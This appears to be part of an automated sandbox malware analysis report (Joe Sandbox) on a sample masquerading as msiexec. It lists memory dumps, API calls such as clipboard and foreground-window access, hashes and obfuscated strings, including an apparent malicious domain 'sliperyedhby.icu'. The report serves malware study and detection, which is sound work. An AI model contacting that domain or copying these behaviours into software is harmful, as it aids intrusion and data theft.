                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                • Opcode ID: cce03d1163197ca3d2a01eeb2aa3e9ebba195bb71f735229ee33fd10b46e3088
                                                                                                                                                                                                                                • Instruction ID: 9526c84e7c7a986e5b9435469cc8b88ca0d5764a5cda67c3a5deda03ef362c9f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cce03d1163197ca3d2a01eeb2aa3e9ebba195bb71f735229ee33fd10b46e3088
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73A13332E10154AFCF99AF78DC51BAE7BA1AF46324F18014DE851DB390DB308952CBE1

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                                                • String ID: &/.1$HI$T%&/$^gFi$sliperyedhby.icu
                                                                                                                                                                                                                                • API String ID: 3861434553-1973299169
                                                                                                                                                                                                                                • Opcode ID: fff01b4f7100cc2016a34ce9e7c1a4c647d5b2168f1041d5e16d5db120956f80
                                                                                                                                                                                                                                • Instruction ID: 5c6351170b3d6f5c6e10ba329916351de42ca999fd1bd2cb9986fdeb7986be57
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fff01b4f7100cc2016a34ce9e7c1a4c647d5b2168f1041d5e16d5db120956f80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FA1FF7454D3D18AD7368F2684A07EBBBE2AFD7304F1849ADD4D90B246C739450ACB93

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,0618F897,00000016,0618CACD,?,?,E8B440B6,0618CACD,?), ref: 0618F8AE
                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,0618F897,00000016,0618CACD,?,?,E8B440B6,0618CACD,?), ref: 0618F8B5
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0618F8C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                • Opcode ID: 1f75c8efd180362d4382a0adbeda11f6f85191fab887609722a8d231cf02ec0b
                                                                                                                                                                                                                                • Instruction ID: 491426042e238b4680534f53b515e8df125ae60b1469aed30cbd081d8194dd77
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f75c8efd180362d4382a0adbeda11f6f85191fab887609722a8d231cf02ec0b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D09E31000548BFDF813F62DE0D95D3F26AF452C1F544020BE25D5020DB3599A2EF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 061930BB: GetConsoleOutputCP.KERNEL32(E8B440B6,00000000,00000000,00000000), ref: 0619311E
                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,061AA588,00000014,0618D50D,00000000,00000000,00000000), ref: 06193B2A
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 06193B34
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2915228174-0
                                                                                                                                                                                                                                • Opcode ID: c860fb97723f6c73cf87f67f7c2e93752df2b67005bdbe04cc3dec4407bf822b
                                                                                                                                                                                                                                • Instruction ID: b64b60c77f6004163109c340c32153408681527571fcb314d40a9ed9b06d44d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c860fb97723f6c73cf87f67f7c2e93752df2b67005bdbe04cc3dec4407bf822b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F461C171D00119AFDF95CFA8C884EEEBBBAAF49304F154149E921E7251D732DA05CBB1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 06192EAC
                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 06192EBE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3000768030-0
APIs
• GetForegroundWindow.USER32 ref: 00319FBB
• GetForegroundWindow.USER32 ref: 00319FCC
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 002ED075
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 002ED043
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                • Opcode ID: 74eb73a36df54a61872c1067a95a257890f1082f5b8e9c9ef248387d993f7ffe
                                                                                                                                                                                                                                • Instruction ID: 24c0cdce0ab0f4161feb611ec57074302c24d3683740cd3ea3d6940e6fdee2bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74eb73a36df54a61872c1067a95a257890f1082f5b8e9c9ef248387d993f7ffe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD0A731564244BFD254AB2CEC0BF673A1C830B754F900728F7A3CA6D2D9116911C5A5
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,0619CCF9,?,?,00000000,?,0619CCF9,00000000,0000000C), ref: 0619C9B4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: 5c94b8a8ae511d836ddfc51298e6051b2e21376210233dee58c89cb26a9f647e
                                                                                                                                                                                                                                • Instruction ID: 77b5b7d2dcca7d412da82c4172a3b2fd1f2c6afacfeb3ddc2edaecc0496ee634
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c94b8a8ae511d836ddfc51298e6051b2e21376210233dee58c89cb26a9f647e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30D06C3200024DFBDF128E84DD06EDA3BAAFB48754F018000BE1896020C736E872AB90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,?,00000000), ref: 00316478
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                • Opcode ID: 190b1c37261d77c5a87e49d28f73ed1c13104b3fa7df8b50abf1d411d2f0ca15
                                                                                                                                                                                                                                • Instruction ID: 53e0523fe1e8e4849b2ddbb20f7c4fe8429b14caff032f5251ee609d2a8f5c70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 190b1c37261d77c5a87e49d28f73ed1c13104b3fa7df8b50abf1d411d2f0ca15
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BB00230145655B9E17217115CD9F7F1D7CDF43F95F104459B314140E046645502D57D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 003163D8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: b8471bf78ce379a1c3583dcc7d7f1a0fab8edd3bfd389bdd4d6d8f0232fc1265
                                                                                                                                                                                                                                • Instruction ID: 080d201b4512b5ed6868ae767db1ab5ecd00598542fe10e87550065817ab0fdd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8471bf78ce379a1c3583dcc7d7f1a0fab8edd3bfd389bdd4d6d8f0232fc1265
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEB012300000005BDD051B00AC05B103518AB00706FA40050A404480A1C1524826D558
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: !$!$#$#$%$'$'$)$)$+$,$-$-$/$0$1$3$3$4$5$7$9$9$;$=$?$?$A$B$B$B$C$C$E$E$E$G$M$M$Q$Q$Q$S$S$T$U$U$W$W$W$Y$Y$Y$Z$Z$[$[$]$]$]$]$_$_$`$`$a$h$k$l$l$o$p$p$u$y${$}$~
                                                                                                                                                                                                                                • API String ID: 0-2161944005
                                                                                                                                                                                                                                • Opcode ID: c700aac7b6c0bf8d988af2d8bc582691a89167fec8ce5a6b5ee9c49b079b15e0
                                                                                                                                                                                                                                • Instruction ID: 1df760b9289ecf0b854c9ee2892ae5fdc5fe90ef4c8bb040861c9df61640a085
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c700aac7b6c0bf8d988af2d8bc582691a89167fec8ce5a6b5ee9c49b079b15e0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9412FC2090C7D9CDDB22C67C9C487CEBFA15B27314F1842D9D1E86B2D2C7B54A89CB66
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: !E{$5a!g$:om$;m)c$>s;q$B0$M1S7$T/i-$^#X!$a+c)$c'[%$d?O=$lk$mu$x~$%'$57$9;$=?$ac$qs$}s
                                                                                                                                                                                                                                • API String ID: 0-54867547
                                                                                                                                                                                                                                • Opcode ID: f0df1ecf5451a991e3113636eafd6b213825e9e910424cdc6b6169a2e67132c9
                                                                                                                                                                                                                                • Instruction ID: 9ca6d4ae1f2f64d04f7a99fa3392c7fdaefb99ab50e0a4db7e23410516b2ee0a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0df1ecf5451a991e3113636eafd6b213825e9e910424cdc6b6169a2e67132c9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30724EB06093858BE734CF15D881BDBBBE1BB82304F108A2DD5D99B396DB748146CF92
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: !E{$5a!g$:om$;m)c$>s;q$B0$M1S7$T/i-$^#X!$a+c)$c'[%$d?O=$lk$mu$x~$ac$qs$}s
                                                                                                                                                                                                                                • API String ID: 0-3380732962
                                                                                                                                                                                                                                • Opcode ID: fba972f5e850118022a53f90a0baa10fbdb0a061049a9d261fc2c8631a3334c3
                                                                                                                                                                                                                                • Instruction ID: 357402912833989903aed2f6ff7da87a83758cb85bed969cbd4934dffc3c70f6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fba972f5e850118022a53f90a0baa10fbdb0a061049a9d261fc2c8631a3334c3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4724EB16093858BE334CF15D881B9FBBE1BB82304F108A2DD5D99B396DB748546CF92
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                • String ID: <$F$G$]$c
                                                                                                                                                                                                                                • API String ID: 2832541153-1818401840
                                                                                                                                                                                                                                • Opcode ID: 2415e78230a63c72ccee3805d607b7d72ae58d053f5330cacf076698c258fcac
                                                                                                                                                                                                                                • Instruction ID: acd06e3d20f81882a45c1cfd55ae5716ab3a89081de332430d169a182a03e11a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2415e78230a63c72ccee3805d607b7d72ae58d053f5330cacf076698c258fcac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B41C47110D7818FD302AFBC949836FFFE49B82324F45896DE4D9862D2D6788548C793
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: =:;8$=:;8$=:;8$=:;8$t%cz$t%cz$t%cz$t%cz$t%cz$t%cz$t%cz$t%cz$t`rS
                                                                                                                                                                                                                                • API String ID: 2994545307-3223954259
                                                                                                                                                                                                                                • Opcode ID: 1b7a347aada1adcdd181ed60fea651d530430c63b4f80aad0319ff7aa3a8970c
                                                                                                                                                                                                                                • Instruction ID: c08a4b8986bc2f9349e271abfcf90efb1fa2b1b95110cd12ab2c4ebe08368ac9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b7a347aada1adcdd181ed60fea651d530430c63b4f80aad0319ff7aa3a8970c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62328A72A282228BD329CF28CC5077BB797FBD5340F69853DCA8597255DB70A912CBC1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ~`e$~`e$3$";yi$&$8$<$GDMv$KOAK$^TVZ$h|{$jQ6o$w}f:
                                                                                                                                                                                                                                • API String ID: 0-598920927
                                                                                                                                                                                                                                • Opcode ID: 7efb5ec6f57011f14955be026c5cd2b1979d3f95fe6787914194d3367219e38b
                                                                                                                                                                                                                                • Instruction ID: 10eccdee668619eb7c36b37f32a6d0160d14856c100586c4656e885eb3b9baf2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7efb5ec6f57011f14955be026c5cd2b1979d3f95fe6787914194d3367219e38b
